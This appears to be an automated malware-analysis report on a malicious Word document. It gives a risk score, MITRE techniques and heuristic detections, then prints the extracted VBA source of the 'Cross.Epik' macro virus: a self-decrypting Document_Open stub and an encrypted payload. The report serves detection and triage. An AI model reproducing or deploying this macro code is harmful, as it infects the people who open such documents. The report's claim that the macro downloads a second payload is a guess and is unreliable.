MALICIOUS
120
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a Microsoft Word document containing VBA macros. The 'Document_Open' macro is designed to execute upon opening the document. This macro appears to be obfuscated but is likely intended to download and execute a secondary payload, as indicated by the ClamAV detection 'Doc.Trojan.Epic-1'. The presence of VBA macros and the 'Document_Open' event strongly suggest a malicious document, likely delivered via spearphishing.
Heuristics 3
-
ClamAV: Doc.Trojan.Epic-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Epic-1
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 21189 bytes |
SHA-256: 0a0ca237154a9b46d1a265aefdc0938aa88757e18c17605495c97a3aaafa9317 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True ' 'Cross.Epik Private Sub Document_Open() On Error Resume Next: Set objDoc = ThisDocument.VBProject.VBComponents(1).CodeModule For y = 12 To 46: If Mid(objDoc.Lines(y, 1), 1, 1) = Chr(39) Then objDoc.ReplaceLine y, c(Mid(objDoc.Lines(y, 1), 2), Val(Mid(objDoc.Lines(58, 1), 2))) & Chr(39) Next: o8: End Sub Private Sub Project_Open() On Error Resume Next: Set objProj = ThisProject.VBProject.VBComponents(1).CodeModule For y = 12 To 46: If Mid(objProj.Lines(y, 1), 1, 1) = Chr(39) Then objProj.ReplaceLine y, c(Mid(objProj.Lines(y, 1), 2), Val(Mid(objProj.Lines(58, 1), 2))) & Chr(39) Next: o9: End Sub Private Sub o8() 'Ł‚Ě©žž�žĚľ‰ź™�‰Ě˘‰”�ÖĚż‰�Ě�ކ¨�ŹĚŃ̸„…ź¨�Ź™�‰‚�Âş®Ľž�†‰Ź�Âş®Ż��ś�‚‰‚�źÄÝĹÂŻ��‰ˇ��™€‰ '�ކ¨�ŹÂľ‰ś€ŤŹ‰ …‚‰ĚŮÔŔĚŻ„žÄßŐĹĚĘĚĄ‚�Äľ‚�ĚĆĚŘŮĹĚÇĚŢÜŮ 'Ş�žĚ•ĚŃĚÝ̸�ĚŘŰÖĚĄŠĚľ…‹„�Ä�ކ¨�ŹÂ …‚‰źÄ•ŔĚÝĹŔĚÝĹĚŃĚŻ„žÄßŐĹ̸„‰‚Ě�ކ¨�ŹÂľ‰ś€ŤŹ‰ …‚‰Ě•ŔĚŻ„žÄßŐĹĚĘĚŹÄ ‰Š�Ä�ކ¨�ŹÂ …‚‰źÄ•ŔĚÝĹŔĚ ‰‚Ä�ކ¨�ŹÂ …‚‰źÄ•ŔĚÝĹĹĚÁĚŢĹŔĚşŤ€Äˇ…�Ä�ކ¨�ŹÂ …‚‰źÄŮÔŔĚÝĹŔĚŢĹĹĹ '˘‰”�ÖĚż‰�Ě�ކĽž�†ĚŃĚ«‰�ŁŽ†‰Ź�ÄŔĚΡżĽž�†‰Ź�Âśś€…ŹŤ�…�‚ÎĹÂş®©Âş®Ľž�†‰Ź�źÄÝĹÂş®Ż��ś�‚‰‚�źÄÝĹÂŻ��‰ˇ��™€‰ 'ĄŠĚ�ކĽž�†ĚŃĚÎÎ̸„‰‚Ěż‰�Ě�ކĽž�†ĚŃĚŻž‰Ť�‰ŁŽ†‰Ź�ÄΡżĽž�†‰Ź�Âśś€…ŹŤ�…�‚ÎĹÂş®©Âş®Ľž�†‰Ź�źÄÝĹÂş®Ż��ś�‚‰‚�źÄÝĹÂŻ��‰ˇ��™€‰ÖĚšŤž˝™…�ĚŃĚÝ 'ĄŠĚ�ކĽž�†Â …‚‰źÄŢŔĚÝĹĚĐŇĚÎËŻž�źźÂ©ś…‡Î̸„‰‚Ě�ކĽž�†Â¨‰€‰�‰ …‚‰źĚÝŔĚ�ކĽž�†ÂŻ�™‚�ŁŠ …‚‰źÖĚ�ކĽž�†ÂĄ‚ź‰ž� …‚‰źĚÝŔĚ�ކ¨�ŹÂ …‚‰źÄÝŔĚ�ކ¨�ŹÂŻ�™‚�ŁŠ …‚‰źĹÖĚ�ކĽž�†Âľ‰ś€ŤŹ‰ …‚‰ĚŰŔĚÎĽž…šŤ�‰Ěż™ŽĚĽž�†‰Ź�łŁś‰‚Ä®•şŤ€Ěś†ĚźĚˇżĽž�†‰Ź�ÂĽž�†‰Ź�ĹÎ 'ĄŠĚ¸„…ź¨�Ź™�‰‚�ĚŃĚŹ�…š‰¨�Ź™�‰‚�̸„‰‚Ěż‰�Ě�ކ¤�ź�ĚŃ̢�ž�Ť€¸‰�ś€Ť�‰Ě©€ź‰Ěż‰�Ě�ކ¤�ź�ĚŃĚŹ�…š‰¨�Ź™�‰‚� 'ż‰�Ě�ކ¤�ź�ĚŃĚ�ކ¤�ź�Âş®Ľž�†‰Ź�Âş®Ż��ś�‚‰‚�źÄÝĹÂŻ��‰ˇ��™€‰ 'ĄŠĚ�ކ¤�ź� …‚‰źÄŢŔĚÝĹĚĐŇĚÎËŻž�źźÂ©ś…‡Î̸„‰‚ '�ކ¤�ź�¨‰€‰�‰ …‚‰źĚÝŔĚ�ކ¤�ź�ÂŻ�™‚�ŁŠ …‚‰źÖĚ�ކ¤�ź�ÂĄ‚ź‰ž� …‚‰źĚÝŔĚ�ކ¨�ŹÂ …‚‰źÄÝŔĚ�ކ¨�ŹÂŻ�™‚�ŁŠ …‚‰źĹ 'ĄŠĚ¸„…ź¨�Ź™�‰‚�ĚŃ̢�ž�Ť€¸‰�ś€Ť�‰Ě¸„‰‚ĚŹ�…š‰¨�Ź™�‰‚�ÂżŤš‰źĚŹ�…š‰¨�Ź™�‰‚�ÂŞ™€€˘Ť�‰ŔĚ›�Ş�ž�Ť�¨�Ź™�‰‚� '©‚�ĚĄŠ 'ĄŠĚšŤž˝™…�ĚŃĚÝ̸„‰‚ 'Ş�žĚ•ĚŃĚÝ̸�̸Ťź‡źÂŻ�™‚�ÖĚĄŠĚĄ‚ż�žÄÝŔ̸Ťź‡źÄ•Ĺ¢Ť�‰ŔĚΡ…Źž�ź�Š�ĚĽž�†‰Ź�ÎĹ̸„‰‚̸Ťź‡źÄ•ĹÂŻ€�ź‰ '˘‰”�ÖĚ©‚�ĚĄŠ 'ĄŠĚĄ‚ż�žÄÝŔ̸…�‰ŔĚÎÚÎĹ̸„‰‚ 'ˇź‹®�”ĚÎż„�™€�ĚĄĚ„�€�Ě�•Ě„‰Ť�Ě™śĚ„…‹„ÓĚŁžĚź„�™€�ĚĄĚŽž‰Ť‡Ě��›‚ĚŤ‚�ĚŹž•ÓÎĚĘĚšŽŻž ŠĚĘĚλ„Ť�˟̕�™žĚ‰ś…‡ÓÎŔĚšŽ˝™‰ź�…�‚ŔĚΩś…‡Î 'Ş�žĚ•ĚŃĚÝ̸�ĚÝÜÖĚż„‰€€ĚÎś…‚‹ĚÁ�ĚÁ€ĚÝÜÜÜÜĚÝÜÂÚÚÂÜÂÜÎŔĚšŽ¤…�‰Ö̢‰”�ÖĚŞ�žĚ•ĚŃĚÝ̸�ĚÝÜÖĚż„‰€€ĚÎś…‚‹ĚÁ�ĚÁ€ĚÝÜÜÜÜĚÝÜÂŰÜÂÜÂÜÎŔĚšŽ¤…�‰Ö̢‰”� '©‚�ĚĄŠÖĚŁś�…�‚źÂş…ž™źĽž��‰Ź�…�‚ĚŃĚŞŤ€ź‰ÖĚŁś�…�‚źÂżŤš‰˘�ž�Ť€Ľž��ś�ĚŃĚŞŤ€ź‰ End Sub Private Sub o9() 'Ł‚Ě©žž�žĚľ‰ź™�‰Ě˘‰”�ÖĚż‰�Ě�ކĽž�†ĚŃ̸„…źĽž�†‰Ź�Âş®Ľž�†‰Ź�Âş®Ż��ś�‚‰‚�źÄÝĹÂŻ��‰ˇ��™€‰ '�ކĽž�†Âľ‰ś€ŤŹ‰ …‚‰ĚŮÔŔĚŻ„žÄßŐĹĚĘĚĄ‚�Äľ‚�ĚĆĚŘŮĹĚÇĚŢÜŮ 'Ş�žĚ•ĚŃĚÝ̸�ĚŘŰÖĚĄŠĚľ…‹„�Ä�ކĽž�†Â …‚‰źÄ•ŔĚÝĹŔĚÝĹĚŃĚŻ„žÄßŐĹ̸„‰‚Ě�ކĽž�†Âľ‰ś€ŤŹ‰ …‚‰Ě•ŔĚŻ„žÄßŐĹĚĘĚŹÄ ‰Š�Ä�ކĽž�†Â …‚‰źÄ•ŔĚÝĹŔĚ ‰‚Ä�ކĽž�†Â …‚‰źÄ•ŔĚÝĹĹĚÁĚŢĹŔĚşŤ€Äˇ…�Ä�ކĽž�†Â …‚‰źÄŮÔŔĚÝĹŔĚŢĹĹĹ '˘‰”�ÖĚż‰�Ě�ކ¨�ŹĚŃĚ«‰�ŁŽ†‰Ź�ÄŔĚλ�ž�Âśś€…ŹŤ�…�‚ÎĹ¢�ž�Ť€¸‰�ś€Ť�‰Âş®Ľž�†‰Ź�Âş®Ż��ś�‚‰‚�źÄÝĹÂŻ��‰ˇ��™€‰ 'ĄŠĚ�ކ¨�ŹĚŃĚÎÎ̸„‰‚Ěż‰�Ě�ކ¨�ŹĚŃĚŻž‰Ť�‰ŁŽ†‰Ź�Äλ�ž�Âśś€…ŹŤ�…�‚ÎĹÂş®Ľž�†‰Ź�Âş®Ż��ś�‚‰‚�źÄÝĹÂŻ��‰ˇ��™€‰ÖĚšŤž˝™…�ĚŃĚÝ 'ĄŠĚ�ކ¨�ŹÂ …‚‰źÄŢŔĚÝĹĚĐŇĚÎËŻž�źźÂ©ś…‡Î̸„‰‚Ě�ކ¨�ŹÂ¨‰€‰�‰ …‚‰źĚÝŔĚ�ކ¨�ŹÂŻ�™‚�ŁŠ …‚‰źÖĚ�ކ¨�ŹÂĄ‚ź‰ž� …‚‰źĚÝŔĚ�ކĽž�†Â …‚‰źÄÝŔĚ�ކĽž�†ÂŻ�™‚�ŁŠ …‚‰źĹÖĚ�ކ¨�ŹÂľ‰ś€ŤŹ‰ …‚‰ĚŰŔĚÎĽž…šŤ�‰Ěż™ŽĚĽž�†‰Ź�łŁś‰‚ÄĹÎ 'šŤžŻ™žž‰‚�ĚŃĚŹ�…š‰Ľž�†‰Ź�¢Ť�‰ÖĚŞ�žĚ•ĚŃĚÝ̸�ĚĽž�†‰Ź�źÂŻ�™‚�ÖĚż‰�Ě�ކ¤�ź�ĚŃĚĽž�†‰Ź�źÄ•ĹÂş®Ľž�†‰Ź�Âş®Ż��ś�‚‰‚�źÄÝĹÂŻ��‰ˇ��™€‰ 'ĄŠĚ�ކ¤�ź� …‚‰źÄŢŔĚÝĹĚĐŇĚÎËŻž�źźÂ©ś…‡Î̸„‰‚Ě�ކ¤�ź�¨‰€‰�‰ …‚‰źĚÝŔĚ�ކ¤�ź�ÂŻ�™‚�ŁŠ …‚‰źÖĚ�ކ¤�ź�ÂĄ‚ź‰ž� …‚‰źĚÝŔĚ�ކĽž�†Â …‚‰źÄÝŔĚ�ކĽž�†ÂŻ�™‚�ŁŠ …‚‰źĹ 'Ş…€‰żŤš‰źĚĽž�†‰Ź�źÄ•ĹÂŞ™€€˘Ť�‰ '˘‰”�ÖĚĽž�†‰Ź�źÄšŤžŻ™žž‰‚�ĹÂŹ�…šŤ�‰ 'ĄŠĚĄ‚ż�žÄÝŔ̸…�‰ŔĚÎÚÎĹ̸„‰‚ 'ˇź‹®�”ĚÎż„�™€�ĚĄĚ„�€�Ě�•Ě„‰Ť�Ě™śĚ„…‹„ÓĚŁžĚź„�™€�ĚĄĚŽž‰Ť‡Ě��›‚ĚŤ‚�ĚŹž•ÓÎĚĘĚšŽŻž ŠĚĘĚλ„Ť�˟̕�™žĚ‰ś…‡ÓÎŔĚšŽ˝™‰ź�…�‚ŔĚΩś…‡Î 'Ş�žĚ•ĚŃĚÝ̸�ĚÝÜÖĚż„‰€€ĚÎś…‚‹ĚÁ�ĚÁ€ĚÝÜÜÜÜĚÝÜÂÚÚÂÜÂÜÎŔĚšŽ¤…�‰Ö̢‰”�ÖĚŞ�žĚ•ĚŃĚÝ̸�ĚÝÜÖĚż„‰€€ĚÎś…‚‹ĚÁ�ĚÁ€ĚÝÜÜÜÜĚÝÜÂŰÜÂÜÂÜÎŔĚšŽ¤…�‰Ö̢‰”� '©‚�ĚĄŠÖĚśś€…ŹŤ�…�‚¡ŤŹž�ş…ž™źĽž��‰Ź�…�‚ĚŃĚŞŤ€ź‰ÖĚŞ…€ ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.